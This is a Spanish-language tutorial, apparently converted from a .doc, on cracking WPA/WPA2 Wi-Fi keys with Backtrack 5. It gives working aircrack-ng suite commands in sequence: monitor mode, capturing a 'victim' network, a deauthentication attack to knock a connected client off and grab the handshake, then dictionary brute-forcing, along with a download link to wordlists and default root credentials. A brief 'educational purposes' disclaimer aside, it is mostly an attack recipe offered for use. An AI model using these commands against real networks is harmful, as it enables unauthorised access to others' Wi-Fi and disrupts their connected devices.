Hackear Claves wpa con Backtrack 5 R1 Revolution.doc

5
Hackear Claves wpa con Backtrack 5 R1 Revolution Qué tal compas de t¡ en esta ocación regreso con un tutorial de auditoria de redes para sacar claves de encriptación wpa/wpa2. Este Post es con fines Educativos y/o Didácticos, no me hago responsable por el uso malicioso. Bueno, cómo dice el pollo: Vamos al grano ñ_ñ 1.- El primer paso es poner la targeta inalámbrica en modo monitor (monitor mode enabled): airmon-ng start wlan0

Transcript of Hackear Claves wpa con Backtrack 5 R1 Revolution.doc

Page 1: Hackear Claves wpa con Backtrack 5 R1 Revolution.doc

Hackear Claves wpa con Backtrack 5 R1 Revolution

Qué tal compas de t¡ en esta ocación regreso con un tutorial de auditoria de redes para sacar claves de encriptación wpa/wpa2.

                             

Este Post es con fines Educativos y/o Didácticos, no me hago responsable por el uso malicioso.

Bueno, cómo dice el pollo: Vamos al grano ñ_ñ

1.- El primer paso es poner la targeta inalámbrica en modo monitor (monitor mode enabled):      airmon-ng start wlan0

Page 2: Hackear Claves wpa con Backtrack 5 R1 Revolution.doc

2.- Ahora vamos a buscar redes disponibles para eso ejecutamos el siguiente comando:

        airodump-ng mon0

3.- Aqui vamos a capturar la red víctima para posteriormente obtener el "Handshake"        airodump-ng -w red --bssid 00:11:22:33:44:55 -c 11 mon0

Donde:

-w = nombre del archivo .cap (donde se guarda la captura)

--bssid = dirección mac de la red víctima

-c = canal de la red víctima 

Tenemos qué tener un cliente conectado en la red víctima, para sacar el "Handshake"

4.- Ahora abrimos una 2° Terminal y vamos a capturar el "Handshake". el handshake es un paquete especial qué se recibe cuando se conecta al modem. Tenemos qué desconectar al cliente (station) Para esto ejecutamos el siguiente comando:

           aireplay-ng --deauth 20 -a 00:11:22:33:44:55 -c 55:44:33:22:11:00 mon0

Donde:

--deauth = representa las veces qué se desconecta al dispositivo (station)

Page 3: Hackear Claves wpa con Backtrack 5 R1 Revolution.doc

-a = señala la dirección mac de la red víctima

-c = señala la dirección mac del cliente a desconectar

5.- Vamos a comprobar si capturamos el "handshake" para esto vamos a la primera terminal y nos fijamos en la parte superior derecha (a un lado de la fecha y hora) lo siguiente: "WPA handshake"

Una vez capturado el "handshake" procedemos a hacer el ataque con el diccionario a fuerza bruta, para esto se necesitan los diccionarios. A continuación les dejo los links:

Page 4: Hackear Claves wpa con Backtrack 5 R1 Revolution.doc

Son 10 diccionarios por Mediafire:http://www.mediafire.com/?h1knd353a0mvdxr

6.- Ya qué tengamos los diccionarios, procedemos a ejecutar aircrack-ng

       aircrack-ng -a 2 -w ruta/al/diccionario red-01.cap

Y esperan a qué consiga la clave, ya saben si no les funciona prueben otro y sean pacientes.

¡TODO DEPENDE DE USTEDES! SUERTE....... 

Bueno eso ha sido todo por este post, comenten, Síganme los buenos y agreguenlo a favoritos y unos puntos...

Modo Gráfico:

User$: rootPassword$: toor$ Startx